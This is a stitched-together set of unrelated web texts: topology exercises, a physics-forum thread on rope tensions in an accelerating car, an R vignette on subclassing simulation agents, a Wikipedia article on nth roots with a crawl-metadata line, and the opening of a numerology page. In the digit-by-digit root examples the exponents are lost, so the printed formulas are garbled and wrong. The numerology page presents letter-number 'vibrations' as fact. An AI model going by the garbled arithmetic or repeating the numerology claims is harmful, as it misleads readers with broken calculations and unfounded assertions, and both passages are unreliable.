Exercise 1. Find metric topological spaces $$A,B,C$$ such that $$A$$ is not homeomorphic to $$B$$, but $$A\times C$$ is homeomorphic to $$B\times C$$.

Exercise 2. Find path connected metric topological spaces $$A,B,C$$ such that $$A$$ is not homeomorphic to $$B$$, but $$A\times C$$ is homeomorphic to $$B\times C$$.
https://www.physicsforums.com/threads/box-in-a-car.235088/
# Box in a Car

Hi, I'm new here. I have a problem.

## Homework Statement

A box with mass m is held by two horizontal ropes and two vertical ropes. The box is inside a stationary car. If the car suddenly accelerates with acceleration a, the box will remain still inside the car. What is:
a. The acceleration of the box/car? (State it in terms of t1, t2, t3, t4 and g.)
b. The separation after the time t? (State it in terms of t1, t2, t3, t4, t and g.)

The illustration is here -> xttp://i31.tinypic.com/izvnev.jpg (change x to h)

## Homework Equations

$$\Sigma F = ma$$

## The Attempt at a Solution

a.
t3 + t1 = ma
m = (t3 + t1)/a (1)

t4 + t2 = mg
m = (t4 + t2)/g (2)

(t3 + t1)/a = (t4 + t2)/g
a = g(t3 + t1)/(t4 + t2) (3)

b.
S = Vt
S = a * t * t
S = (g(t3 + t1)/(t4 + t2)) * t^2
S = g t^2 (t3 + t1)/(t4 + t2)

I actually don't really know how the tensions work. I hope someone can explain it to me. And sorry, I'm not used to using LaTeX yet.

Last edited:

PhanthomJay
Homework Helper
Gold Member

Hi, Vermillion, and welcome to the Forums! A few points here to help you along in part (a), if I understand the problem correctly, and assuming horizontal motion and massless, inextensible ropes: First, tension forces always pull away from the object they act on, so in your equations, check your plus and minus signs. Secondly, you have equated your 2 equations when solving each for m, which is unnecessary. The accelerations in the horizontal and vertical directions are independent of each other. Thirdly, with the box accelerating to the right (with respect to the ground), the box would appear to fare quite well without the left and bottom ropes present.

For part (b), what separation is the problem talking about? Since the box remains still inside the car, there can be no separation between the box and car, so I guess the problem means to ask about the displacement of the box with respect to the ground, in which case you need to use your basic motion equations.

Oh wow, thanks! I actually never knew that tension forces always pull away from the object they act on, duh... As for the 2 equations for m, I needed them to solve for the acceleration a in terms of t1, t2, t3, t4, and g. My third equation is actually m = m. Sorry, I didn't type it.

I think I have the correct equations now.
ma + t1 = t3
ma = t3 - t1
m = (t3 - t1)/a (1)

mg + t2 = t4
mg = t4 - t2
m = (t4 - t2)/g (2)

m = m
(t3 - t1)/a = (t4 - t2)/g
a = g(t3 - t1)/(t4 - t2) (3)

So the displacement would be

s = vt
s = a*t^2
s = (t^2 * g(t3 - t1))/(t4 - t2)

Is that correct?

PhanthomJay
Homework Helper
Gold Member

Part (a) is correct, since the problem asked you to solve for the acceleration in terms of those variables. Part (b), however, is not correct. In the equation s = vt, the 'v' refers to the average velocity (the average of the initial velocity and the final velocity at time 't'), whereas in the equation V = at, the 'V' refers to the final velocity at the end of the time period for an object starting from rest. Average velocity and final velocity are not the same. How are they related?

You're right, I forgot that the velocity is not constant. Then I should use

$$s = v_0 t + \frac{at^2}{2}$$

Because the car started from rest,

$$v_0 = 0$$

$$s = \frac{at^2}{2}$$

$$s = \frac{gt^2(t_3-t_1)}{2(t_4-t_2)}$$

Is that correct?

Last edited:
PhanthomJay
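As a quick numeric sanity check of the final result (the tension values below are made up for illustration; SI units throughout):

```python
g = 9.8                  # m/s^2
t1, t3 = 10.0, 30.0      # tensions in the two horizontal ropes, N (t3 > t1)
t2, t4 = 5.0, 54.0       # tensions in the two vertical ropes, N (t4 > t2)
t = 2.0                  # elapsed time, s

a = g * (t3 - t1) / (t4 - t2)   # acceleration: 9.8 * 20 / 49 = 4.0 m/s^2
s = a * t**2 / 2                # displacement from rest: 4.0 * 4 / 2 = 8.0 m
print(a, s)
```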
https://cran.ma.ic.ac.uk/web/packages/villager/vignettes/extending-agents.html
# extending-winiks

```r
library(villager)
library(leaflet)
#> Warning: package 'leaflet' was built under R version 4.0.5
```

# Extending Agents

To create agents (winiks) that have more properties than the ones provided by villager, subclass the winik class into a new R6 class. Once subclassed, additional properties can be added to the winik, which can be used in the subsequent model. The new winik class can be tied to individual villages. This gives flexibility to model populations differently when running under the same simulation.

To add new members to the winik class,

1. Copy the winik class source code
2. Create the new member variable
3. Add it as a parameter to the initialize function
4. Make an entry for it in the as_table function

## Agent with a GPS coordinate

To give a complete example of the subclassing process, consider an extended agent. In this case the agent has an additional property, gps_coordinates, that's a named list of latitude and longitude coordinates: [lat=1234, long=1234]. Each coordinate gets updated by the model each day by a random number.

To start the base class off, the original class was copied to save time with the member variable definitions.

### Custom winik class

```r
gps_winik <- R6::R6Class("winik",
  inherit = villager::winik,
  public = list(
    age = NULL,
    alive = NULL,
    children = NULL,
    father_id = NULL,
    first_name = NULL,
    gender = NULL,
    health = NULL,
    identifier = NULL,
    last_name = NULL,
    mother_id = NULL,
    partner = NULL,
    profession = NULL,
    latitude = NULL,
    longitude = NULL,

    initialize = function(identifier = NA,
                          first_name = NA,
                          last_name = NA,
                          age = 0,
                          mother_id = NA,
                          father_id = NA,
                          partner = NA,
                          children = vector(mode = "character"),
                          gender = NA,
                          profession = NA,
                          alive = TRUE,
                          health = 100,
                          latitude = 0,
                          longitude = 0) {
      super$initialize(identifier, first_name, last_name, age, mother_id,
                       father_id, partner, children, gender, profession,
                       alive, health)
      self$latitude <- latitude
      self$longitude <- longitude
    },

    as_table = function() {
      winik_table <- data.frame(
        age = self$age,
        alive = self$alive,
        father_id = self$father_id,
        first_name = self$first_name,
        gender = self$gender,
        health = self$health,
        identifier = self$identifier,
        last_name = self$last_name,
        mother_id = self$mother_id,
        partner = self$partner,
        profession = self$profession,
        latitude = self$latitude,
        longitude = self$longitude
      )
      return(winik_table)
    }
  )
)
```

### Initial Condition

We'll create the initial population of one agent in the initial_condition function, which gets run before the model starts. The initial starting location is in Los Angeles, CA.
Note that the new gps_winik class is used to instantiate the agent rather than the library-provided winik class.

```r
initial_condition <- function(current_state, model_data, winik_mgr, resource_mgr) {
  # Create the initial villagers
  test_agent <- gps_winik$new(first_name = "Lewis", last_name = "Taylor", age = 9125,
                              latitude = 33.8785486, longitude = -118.0434921)
  winik_mgr$add_winik(test_agent)
}
```

### Model

Each day, the model picks a small random offset (here between 0.01 and 0.03 degrees) and increments each GPS coordinate on the winik.

```r
test_model <- function(current_state, previous_state, model_data, winik_mgr, resource_mgr) {
  # Loop over all the winiks (just one at the moment)
  for (winik in winik_mgr$get_living_winiks()) {
    # Generate new coordinates
    latitude <- winik$latitude + runif(1, 0.01, 0.03)
    longitude <- winik$longitude + runif(1, 0.01, 0.03)
    winik$latitude <- latitude
    winik$longitude <- longitude
  }
}
```

### Running

Finally, we'll create and run a simulation with a duration of 10 days.

```r
los_angeles <- village$new("Test_Village", initial_condition, test_model, gps_winik)
simulator <- simulation$new(10, list(los_angeles))
simulator$run_model()
```

### Results

```r
# Load in data
#>
#> ── Column specification ────────────────────────────────────────────────────────
#> cols(
#>   age = col_double(),
#>   alive = col_logical(),
#>   father_id = col_logical(),
#>   first_name = col_character(),
#>   gender = col_logical(),
#>   health = col_double(),
#>   identifier = col_character(),
#>   last_name = col_character(),
#>   mother_id = col_logical(),
#>   partner = col_logical(),
#>   profession = col_logical(),
#>   latitude = col_double(),
#>   longitude = col_double(),
#>   step = col_double()
#> )

# Grab just the location data
agent_location <- data.frame(latitude = agent_data$latitude,
                             longitude = agent_data$longitude)

# create a map
leaflet::leaflet() %>%
  leaflet::addMarkers(data = agent_location) # Add agent locations
```
https://en.m.wikipedia.org/wiki/Nth_root
# nth root

In mathematics, an nth root of a number x is a number r which, when raised to the power n, yields x:

$r^{n}=x,$

where n is a positive integer, sometimes called the degree of the root. A root of degree 2 is called a square root and a root of degree 3, a cube root. Roots of higher degree are referred to by using ordinal numbers, as in fourth root, twentieth root, etc. The computation of an nth root is a root extraction.

For example, 3 is a square root of 9, since $3^{2}=9$, and −3 is also a square root of 9, since $(-3)^{2}=9$.

Any non-zero number considered as a complex number has n different complex nth roots, including the real ones (at most two). The nth root of 0 is zero for all positive integers n, since $0^{n}=0$. In particular, if n is even and x is a positive real number, one of its nth roots is real and positive, one is negative, and the others (when n > 2) are non-real complex numbers; if n is even and x is a negative real number, none of the nth roots is real. If n is odd and x is real, one nth root is real and has the same sign as x, while the other (n − 1) roots are not real. Finally, if x is not real, then none of its nth roots are real.

Roots of real numbers are usually written using the radical symbol or radix $\sqrt{\;}$, with $\sqrt{x}$ denoting the positive square root of x if x is positive; for higher roots, $\sqrt[n]{x}$ denotes the real nth root if n is odd, and the positive nth root if n is even and x is positive. In the other cases, the symbol is not commonly used, as it is ambiguous. In the expression $\sqrt[n]{x}$, the integer n is called the index and x is called the radicand.

When complex nth roots are considered, it is often useful to choose one of the roots, called the principal root, as a principal value. The common choice is to take as the principal nth root of x the nth root with the greatest real part and, when there are two (for x real and negative), the one with a positive imaginary part. This makes the nth root a function that is real and positive for x real and positive, and is continuous in the whole complex plane, except for values of x that are real and negative.

A difficulty with this choice is that, for a negative real number and an odd index, the principal nth root is not the real one. For example, $-8$ has three cube roots, $-2$, $1+i\sqrt{3}$ and $1-i\sqrt{3}.$ The real cube root is $-2$ and the principal cube root is $1+i\sqrt{3}.$

An unresolved root, especially one using the radical symbol, is sometimes referred to as a surd or a radical. Any expression containing a radical, whether it is a square root, a cube root, or a higher root, is called a radical expression, and if it contains no transcendental functions or transcendental numbers it is called an algebraic expression.

Roots can also be defined as special cases of exponentiation, where the exponent is a fraction:

$\sqrt[n]{x}=x^{1/n}.$

Roots are used for determining the radius of convergence of a power series with the root test.
The nth roots of 1 are called roots of unity and play a fundamental role in various areas of mathematics, such as number theory, the theory of equations, and the Fourier transform.

## History

An archaic term for the operation of taking nth roots is radication.

## Definition and notation

An nth root of a number x, where n is a positive integer, is any of the n real or complex numbers r whose nth power is x:

$r^{n}=x.$

Every positive real number x has a single positive nth root, called the principal nth root, which is written $\sqrt[n]{x}$. For n equal to 2 this is called the principal square root and the n is omitted. The nth root can also be represented using exponentiation as $x^{1/n}$.

For even values of n, positive numbers also have a negative nth root, while negative numbers do not have a real nth root. For odd values of n, every negative number x has a real negative nth root. For example, −2 has a real 5th root, $\sqrt[5]{-2}=-1.148698354\ldots$ but −2 does not have any real 6th roots.

Every non-zero number x, real or complex, has n different complex nth roots. (In the case x is real, this count includes any real nth roots.) The only complex root of 0 is 0.

The nth roots of almost all numbers (all integers except the nth powers, and all rationals except the quotients of two nth powers) are irrational. For example,

$\sqrt{2}=1.414213562\ldots$

All nth roots of integers are algebraic numbers.

The term surd traces back to al-Khwārizmī (c. 825), who referred to rational and irrational numbers as audible and inaudible, respectively. This later led to the Arabic word "أصم‎" (asamm, meaning "deaf" or "dumb") for irrational number being translated into Latin as "surdus" (meaning "deaf" or "mute"). Gerard of Cremona (c. 1150), Fibonacci (1202), and then Robert Recorde (1551) all used the term to refer to unresolved irrational roots, that is, expressions of the form $\sqrt[n]{i},$ in which $n$ and $i$ are integer numerals and the whole expression denotes an irrational number. Quadratic irrational numbers, that is, irrational numbers of the form $\sqrt{i},$ are also known as "quadratic surds".

### Square roots

The graph $y=\pm\sqrt{x}$.

A square root of a number x is a number r which, when squared, becomes x:

$r^{2}=x.$

Every positive real number has two square roots, one positive and one negative. For example, the two square roots of 25 are 5 and −5. The positive square root is also known as the principal square root, and is denoted with a radical sign:

$\sqrt{25}=5.$

Since the square of every real number is nonnegative, negative numbers do not have real square roots. However, for every negative real number there are two imaginary square roots. For example, the square roots of −25 are 5i and −5i, where i represents a number whose square is −1.

### Cube roots

The graph $y=\sqrt[3]{x}$.

A cube root of a number x is a number r whose cube is x:

$r^{3}=x.$

Every real number x has exactly one real cube root, written $\sqrt[3]{x}$. For example,

$\sqrt[3]{8}=2$ and $\sqrt[3]{-8}=-2.$

Every real number has two additional complex cube roots.
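A small illustration of the real-versus-principal distinction in ordinary Python (a sketch using only the standard library): raising a negative number to the power 1/3 yields the principal complex cube root, so the real cube root has to be recovered separately.

```python
import math

x = -8
principal = x ** (1 / 3)                          # complex: ~ (1 + 1.732j), i.e. 1 + i*sqrt(3)
real_root = math.copysign(abs(x) ** (1 / 3), x)   # real cube root: -2.0
print(principal, real_root)
```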
## Identities and properties

Expressing the degree of an nth root in its exponent form, as in $x^{1/n}$, makes it easier to manipulate powers and roots. If $a$ is a non-negative real number,

$\sqrt[n]{a^{m}}=(a^{m})^{1/n}=a^{m/n}=(a^{1/n})^{m}=(\sqrt[n]{a})^{m}.$

Every non-negative number has exactly one non-negative real nth root, and so the rules for operations with surds involving non-negative radicands $a$ and $b$ are straightforward within the real numbers:

$\begin{aligned}\sqrt[n]{ab}&=\sqrt[n]{a}\,\sqrt[n]{b}\\ \sqrt[n]{\frac{a}{b}}&=\frac{\sqrt[n]{a}}{\sqrt[n]{b}}\end{aligned}$

Subtleties can occur when taking the nth roots of negative or complex numbers. For instance:

$\sqrt{-1}\times\sqrt{-1}\neq\sqrt{-1\times -1}=1,$ but, rather, $\sqrt{-1}\times\sqrt{-1}=i\times i=i^{2}=-1.$

Since the rule $\sqrt[n]{a}\times\sqrt[n]{b}=\sqrt[n]{ab}$ strictly holds for non-negative real radicands only, its application leads to the inequality in the first step above.

## Simplified form of a radical expression

A non-nested radical expression is said to be in simplified form if

1. There is no factor of the radicand that can be written as a power greater than or equal to the index.
2. There are no fractions under the radical sign.
3. There are no radicals in the denominator.

For example, to write the radical expression $\sqrt{\tfrac{32}{5}}$ in simplified form, we can proceed as follows. First, look for a perfect square under the square root sign and remove it:

$\sqrt{\tfrac{32}{5}}=\sqrt{\tfrac{16\times 2}{5}}=4\sqrt{\tfrac{2}{5}}$

Next, there is a fraction under the radical sign, which we change as follows:

$4\sqrt{\tfrac{2}{5}}=\frac{4\sqrt{2}}{\sqrt{5}}$

Finally, we remove the radical from the denominator as follows:

$\frac{4\sqrt{2}}{\sqrt{5}}=\frac{4\sqrt{2}}{\sqrt{5}}\cdot\frac{\sqrt{5}}{\sqrt{5}}=\frac{4\sqrt{10}}{5}=\frac{4}{5}\sqrt{10}$

When there is a denominator involving surds, it is always possible to find a factor to multiply both numerator and denominator by to simplify the expression. For instance, using the factorization of the sum of two cubes:

$\frac{1}{\sqrt[3]{a}+\sqrt[3]{b}}=\frac{\sqrt[3]{a^{2}}-\sqrt[3]{ab}+\sqrt[3]{b^{2}}}{\left(\sqrt[3]{a}+\sqrt[3]{b}\right)\left(\sqrt[3]{a^{2}}-\sqrt[3]{ab}+\sqrt[3]{b^{2}}\right)}=\frac{\sqrt[3]{a^{2}}-\sqrt[3]{ab}+\sqrt[3]{b^{2}}}{a+b}.$

Simplifying radical expressions involving nested radicals can be quite difficult. It is not obvious, for instance, that:

$\sqrt{3+2\sqrt{2}}=1+\sqrt{2}$

The above can be derived through:

$\sqrt{3+2\sqrt{2}}=\sqrt{1+2\sqrt{2}+2}=\sqrt{1^{2}+2\sqrt{2}+\sqrt{2}^{2}}=\sqrt{\left(1+\sqrt{2}\right)^{2}}=1+\sqrt{2}$

Let $r=p/q$, with p and q coprime and positive integers. Then $\sqrt[n]{r}=\sqrt[n]{p}/\sqrt[n]{q}$ is rational if and only if both $\sqrt[n]{p}$ and $\sqrt[n]{q}$ are integers, which means that both p and q are nth powers of some integer.

## Infinite series

The radical or root may be represented by the infinite series:

$(1+x)^{\frac{s}{t}}=\sum_{n=0}^{\infty}\frac{\prod_{k=0}^{n-1}(s-kt)}{n!\,t^{n}}\,x^{n}$
This expression can be derived from the binomial series.\n\n## Computing principal roots\n\n### Using Newton's method\n\nThe nth root of a number A can be computed with Newton's method, which starts with an initial guess x0 and then iterates using the recurrence relation\n\n$x_{k+1}=x_{k}-{\\frac {x_{k}^{n}-A}{nx_{k}^{n-1}}}$\n\nuntil the desired precision is reached. For computational efficiency, the recurrence relation is commonly rewritten\n\n$x_{k+1}={\\frac {n-1}{n}}\\,x_{k}+{\\frac {A}{n}}\\,{\\frac {1}{x_{k}^{n-1}}}.$\n\nThis allows to have only one exponentiation, and to compute once for all the first factor of each term.\n\nFor example, to find the fifth root of 34, we plug in n = 5, A = 34 and x0 = 2 (initial guess). The first 5 iterations are, approximately:\nx0 = 2\nx1 = 2.025\nx2 = 2.02439 7...\nx3 = 2.02439 7458...\nx4 = 2.02439 74584 99885 04251 08172...\nx5 = 2.02439 74584 99885 04251 08172 45541 93741 91146 21701 07311 8...\n(All correct digits shown.)\n\nThe approximation x4 is accurate to 25 decimal places and x5 is good for 51.\n\nNewton's method can be modified to produce various generalized continued fraction for the nth root. For example,\n\n${\\sqrt[{n}]{z}}={\\sqrt[{n}]{x^{n}+y}}=x+{\\cfrac {y}{nx^{n-1}+{\\cfrac {(n-1)y}{2x+{\\cfrac {(n+1)y}{3nx^{n-1}+{\\cfrac {(2n-1)y}{2x+{\\cfrac {(2n+1)y}{5nx^{n-1}+{\\cfrac {(3n-1)y}{2x+\\ddots }}}}}}}}}}}}.$\n\n### Digit-by-digit calculation of principal roots of decimal (base 10) numbers\n\nPascal's Triangle showing $P(4,1)=4$ .\n\nBuilding on the digit-by-digit calculation of a square root, it can be seen that the formula used there, $x(20p+x)\\leq c$ , or $x^{2}+20xp\\leq c$ , follows a pattern involving Pascal's triangle. For the nth root of a number $P(n,i)$  is defined as the value of element $i$  in row $n$  of Pascal's Triangle such that $P(4,1)=4$ , we can rewrite the expression as $\\sum _{i=0}^{n-1}10^{i}P(n,i)p^{i}x^{n-i}$ . For convenience, call the result of this expression $y$ . Using this more general expression, any positive principal root can be computed, digit-by-digit, as follows.\n\nWrite the original number in decimal form. The numbers are written similar to the long division algorithm, and, as in long division, the root will be written on the line above. Now separate the digits into groups of digits equating to the root being taken, starting from the decimal point and going both left and right. The decimal point of the root will be above the decimal point of the radicand. One digit of the root will appear above each group of digits of the original number.\n\nBeginning with the left-most group of digits, do the following procedure for each group:\n\n1. Starting on the left, bring down the most significant (leftmost) group of digits not yet used (if all the digits have been used, write \"0\" the number of times required to make a group) and write them to the right of the remainder from the previous step (on the first step, there will be no remainder). In other words, multiply the remainder by $10^{n}$  and add the digits from the next group. This will be the current value c.\n2. Find p and x, as follows:\n• Let $p$  be the part of the root found so far, ignoring any decimal point. (For the first step, $p=0$ ).\n• Determine the greatest digit $x$  such that $y\\leq c$ .\n• Place the digit $x$  as the next digit of the root, i.e., above the group of digits you just brought down. Thus the next p will be the old p times 10 plus x.\n3. Subtract $y$  from $c$  to form a new remainder.\n4. 
If the remainder is zero and there are no more digits to bring down, then the algorithm has terminated. Otherwise go back to step 1 for another iteration.\n\n#### Examples\n\nFind the square root of 152.2756.\n\n 1 2. 3 4\n/\n\\/ 01 52.27 56\n\n 01 100·1·00·12 + 101·2·01·11 ≤ 1 < 100·1·00·22 + 101·2·01·21 x = 1\n01 y = 100·1·00·12 + 101·2·01·12 = 1 + 0 = 1\n00 52 100·1·10·22 + 101·2·11·21 ≤ 52 < 100·1·10·32 + 101·2·11·31 x = 2\n00 44 y = 100·1·10·22 + 101·2·11·21 = 4 + 40 = 44\n08 27 100·1·120·32 + 101·2·121·31 ≤ 827 < 100·1·120·42 + 101·2·121·41 x = 3\n07 29 y = 100·1·120·32 + 101·2·121·31 = 9 + 720 = 729\n98 56 100·1·1230·42 + 101·2·1231·41 ≤ 9856 < 100·1·1230·52 + 101·2·1231·51 x = 4\n98 56 y = 100·1·1230·42 + 101·2·1231·41 = 16 + 9840 = 9856\n00 00 Algorithm terminates: Answer is 12.34\n\n\nFind the cube root of 4192 to the nearest hundredth.\n\n 1 6. 1 2 4\n3 /\n\\/ 004 192.000 000 000\n\n 004 100·1·00·13 + 101·3·01·12 + 102·3·02·11 ≤ 4 < 100·1·00·23 + 101·3·01·22 + 102·3·02·21 x = 1\n001 y = 100·1·00·13 + 101·3·01·12 + 102·3·02·11 = 1 + 0 + 0 = 1\n003 192 100·1·10·63 + 101·3·11·62 + 102·3·12·61 ≤ 3192 < 100·1·10·73 + 101·3·11·72 + 102·3·12·71 x = 6\n003 096 y = 100·1·10·63 + 101·3·11·62 + 102·3·12·61 = 216 + 1,080 + 1,800 = 3,096\n096 000 100·1·160·13 + 101·3·161·12 + 102·3·162·11 ≤ 96000 < 100·1·160·23 + 101·3·161·22 + 102·3·162·21 x = 1\n077 281 y = 100·1·160·13 + 101·3·161·12 + 102·3·162·11 = 1 + 480 + 76,800 = 77,281\n018 719 000 100·1·1610·23 + 101·3·1611·22 + 102·3·1612·21 ≤ 18719000 < 100·1·1610·33 + 101·3·1611·32 + 102·3·1612·31 x = 2\n015 571 928 y = 100·1·1610·23 + 101·3·1611·22 + 102·3·1612·21 = 8 + 19,320 + 15,552,600 = 15,571,928\n003 147 072 000 100·1·16120·43 + 101·3·16121·42 + 102·3·16122·41 ≤ 3147072000 < 100·1·16120·53 + 101·3·16121·52 + 102·3·16122·51 x = 4\nThe desired precision is achieved:\nThe cube root of 4192 is about 16.12\n\n\n### Logarithmic calculation\n\nThe principal nth root of a positive number can be computed using logarithms. Starting from the equation that defines r as an nth root of x, namely $r^{n}=x,$  with x positive and therefore its principal root r also positive, one takes logarithms of both sides (any base of the logarithm will do) to obtain\n\n$n\\log _{b}r=\\log _{b}x\\quad \\quad {\\text{hence}}\\quad \\quad \\log _{b}r={\\frac {\\log _{b}x}{n}}.$\n\nThe root r is recovered from this by taking the antilog:\n\n$r=b^{{\\frac {1}{n}}\\log _{b}x}.$\n\n(Note: That formula shows b raised to the power of the result of the division, not b multiplied by the result of the division.)\n\nFor the case in which x is negative and n is odd, there is one real root r which is also negative. This can be found by first multiplying both sides of the defining equation by −1 to obtain $|r|^{n}=|x|,$  then proceeding as before to find |r|, and using r = −|r|.\n\n## Geometric constructibility\n\nThe ancient Greek mathematicians knew how to use compass and straightedge to construct a length equal to the square root of a given length, when an auxiliary line of unit length is given. In 1837 Pierre Wantzel proved that an nth root of a given length cannot be constructed if n is not a power of 2.\n\n## Complex roots\n\nEvery complex number other than 0 has n different nth roots.\n\n### Square roots\n\nThe two square roots of a complex number are always negatives of each other. 
For example, the square roots of −4 are 2i and −2i, and the square roots of i are\n\n${\\tfrac {1}{\\sqrt {2}}}(1+i)\\quad {\\text{and}}\\quad -{\\tfrac {1}{\\sqrt {2}}}(1+i).$\n\nIf we express a complex number in polar form, then the square root can be obtained by taking the square root of the radius and halving the angle:\n\n${\\sqrt {re^{i\\theta }}}=\\pm {\\sqrt {r}}\\cdot e^{i\\theta /2}.$\n\nA principal root of a complex number may be chosen in various ways, for example\n\n${\\sqrt {re^{i\\theta }}}={\\sqrt {r}}\\cdot e^{i\\theta /2}$\n\nwhich introduces a branch cut in the complex plane along the positive real axis with the condition 0 ≤ θ < 2π, or along the negative real axis with π < θ ≤ π.\n\nUsing the first(last) branch cut the principal square root ${\\sqrt {z}}$  maps $z$  to the half plane with non-negative imaginary(real) part. The last branch cut is presupposed in mathematical software like Matlab or Scilab.\n\n### Roots of unity\n\nThe number 1 has n different nth roots in the complex plane, namely\n\n$1,\\;\\omega ,\\;\\omega ^{2},\\;\\ldots ,\\;\\omega ^{n-1},$\n\nwhere\n\n$\\omega =e^{\\frac {2\\pi i}{n}}=\\cos \\left({\\frac {2\\pi }{n}}\\right)+i\\sin \\left({\\frac {2\\pi }{n}}\\right)$\n\nThese roots are evenly spaced around the unit circle in the complex plane, at angles which are multiples of $2\\pi /n$ . For example, the square roots of unity are 1 and −1, and the fourth roots of unity are 1, $i$ , −1, and $-i$ .\n\n### nth roots\n\nGeometric representation of the 2nd to 6th roots of a complex number z, in polar form re where r = |z | and φ = arg z. If z is real, φ = 0 or π. Principal roots are shown in black.\n\nEvery complex number has n different nth roots in the complex plane. These are\n\n$\\eta ,\\;\\eta \\omega ,\\;\\eta \\omega ^{2},\\;\\ldots ,\\;\\eta \\omega ^{n-1},$\n\nwhere η is a single nth root, and 1, ωω2, ... ωn−1 are the nth roots of unity. For example, the four different fourth roots of 2 are\n\n${\\sqrt[{4}]{2}},\\quad i{\\sqrt[{4}]{2}},\\quad -{\\sqrt[{4}]{2}},\\quad {\\text{and}}\\quad -i{\\sqrt[{4}]{2}}.$\n\nIn polar form, a single nth root may be found by the formula\n\n${\\sqrt[{n}]{re^{i\\theta }}}={\\sqrt[{n}]{r}}\\cdot e^{i\\theta /n}.$\n\nHere r is the magnitude (the modulus, also called the absolute value) of the number whose root is to be taken; if the number can be written as a+bi then $r={\\sqrt {a^{2}+b^{2}}}$ . Also, $\\theta$  is the angle formed as one pivots on the origin counterclockwise from the positive horizontal axis to a ray going from the origin to the number; it has the properties that $\\cos \\theta =a/r,$  $\\sin \\theta =b/r,$  and $\\tan \\theta =b/a.$\n\nThus finding nth roots in the complex plane can be segmented into two steps. First, the magnitude of all the nth roots is the nth root of the magnitude of the original number. Second, the angle between the positive horizontal axis and a ray from the origin to one of the nth roots is $\\theta /n$ , where $\\theta$  is the angle defined in the same way for the number whose root is being taken. Furthermore, all n of the nth roots are at equally spaced angles from each other.\n\nIf n is even, a complex number's nth roots, of which there are an even number, come in additive inverse pairs, so that if a number r1 is one of the nth roots then r2 = –r1 is another. 
This is because raising the latter's coefficient –1 to the nth power for even n yields 1: that is, (–r1)n = (–1)n × r1n = r1n.\n\nAs with square roots, the formula above does not define a continuous function over the entire complex plane, but instead has a branch cut at points where θ / n is discontinuous.\n\n## Solving polynomials\n\nIt was once conjectured that all polynomial equations could be solved algebraically (that is, that all roots of a polynomial could be expressed in terms of a finite number of radicals and elementary operations). However, while this is true for third degree polynomials (cubics) and fourth degree polynomials (quartics), the Abel–Ruffini theorem (1824) shows that this is not true in general when the degree is 5 or greater. For example, the solutions of the equation\n\n$x^{5}=x+1$\n\ncannot be expressed in terms of radicals. (cf. quintic equation)\n\n## Proof of irrationality for non-perfect nth power x\n\nAssume that ${\\sqrt[{n}]{x}}$  is rational. That is, it can be reduced to a fraction ${\\frac {a}{b}}$ , where a and b are integers without a common factor.\n\nThis means that $x={\\frac {a^{n}}{b^{n}}}$ .\n\nSince x is an integer, $a^{n}$ and $b^{n}$ must share a common factor if $b\\neq 1$ . This means that if $b\\neq 1$ , ${\\frac {a^{n}}{b^{n}}}$  is not in simplest form. Thus b should equal 1.\n\nSince $1^{n}=1$  and ${\\frac {n}{1}}=n$ , ${\\frac {a^{n}}{b^{n}}}=a^{n}$ .\n\nThis means that $x=a^{n}$  and thus, ${\\sqrt[{n}]{x}}=a$ . This implies that ${\\sqrt[{n}]{x}}$  is an integer. Since x is not a perfect nth power, this is impossible. Thus ${\\sqrt[{n}]{x}}$  is irrational." ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86969787,"math_prob":0.99976593,"size":18377,"snap":"2021-43-2021-49","text_gpt3_token_len":4942,"char_repetition_ratio":0.16518804,"word_repetition_ratio":0.026141826,"special_character_ratio":0.30119172,"punctuation_ratio":0.11257764,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999522,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,8,null,5,null,null,null,null,null,null,null,10,null,null,null,5,null,5,null,null,null,6,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-30T13:22:54Z\",\"WARC-Record-ID\":\"<urn:uuid:c931fbd5-dcdc-4259-a617-89ce5d502952>\",\"Content-Length\":\"272889\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cc36ec19-73c1-4fb8-a3a6-1a05662e5ef9>\",\"WARC-Concurrent-To\":\"<urn:uuid:25c47cc5-1db7-4415-95ba-15517d7c6ef7>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.m.wikipedia.org/wiki/Nth_root\",\"WARC-Payload-Digest\":\"sha1:R5CSAHE7DEXQV5ROUU3JIH2AF4UTSKG3\",\"WARC-Block-Digest\":\"sha1:Y65IMJKNM2ZZMUKF43CLEVVWG4ZTU3OI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358973.70_warc_CC-MAIN-20211130110936-20211130140936-00422.warc.gz\"}"}
http://www.first-names-meanings.com/letters-and-numbers.html
[ "", null, "# Correspondence between letters and numbers", null, "As with the first nine numbers, our alphabet is composed of twenty six letters. Each of these letters is definitively attached to a primary number by the principle of THEOSOPHICAL addition, and thereby appears the simplicity of the Pythagorean method.\n\nAny number can be reduced down to a primary number between 1 and 9 by the principle of theosophical addition. For example:\n\n10 becomes 1 + 0 = 1\n16 becomes 1 + 6 = 7\n29 becomes 2 + 9 = 11 which is then reduced to 1 + 1 = 2\n93 becomes 9 + 3 = 12 which is then reduced to 1 + 2 = 3\n1990 is reduced to 1 + 9 + 9 + 0 = 19 which becomes 1 + 9 = 10 and 10 = 1 + 0 = 1\n\nTherefore:\n\nA, the first letter of the alphabet has a value of pure 1\n\nB,  the second letter of the alphabet has a value of pure 2\n\nC,  the third letter of the alphabet has a value of pure 3\n\nD, the fourth letter of the alphabet has a value of pure 4\n\nE,  the fifth letter of the alphabet has a value of pure 5\n\nF,  the sixth letter of the alphabet has a value of pure 6\n\nG,  the seventh letter of the alphabet has a value of pure 7\n\nH, the eighth letter of the alphabet has a value of pure 8\n\nI, the ninth letter of the alphabet has a value of pure 9\n\nJ, the tenth letter of the alphabet, is already the beginning of the second octave of numbers and possesses the values of pure 1 (because 10 is reduced to 1+0=1), though amplified, at a higher vibration\n\nK, the eleventh letter of the alphabet, next in the second octave, carries the signification of the number 2 (because 11 is reduced to 1 + 1=2), but is particularly marked by the symbolism of the number 1, as it is repeated twice. Furthermore, in numerology the 11 is a master number which possesses elevated vibrations, which are attached to the signification of the letter K\n\nL, the twelfth letter of the alphabet carries the significations of the number 3 (because 12 becomes 1+2 = 3), and is marked by the 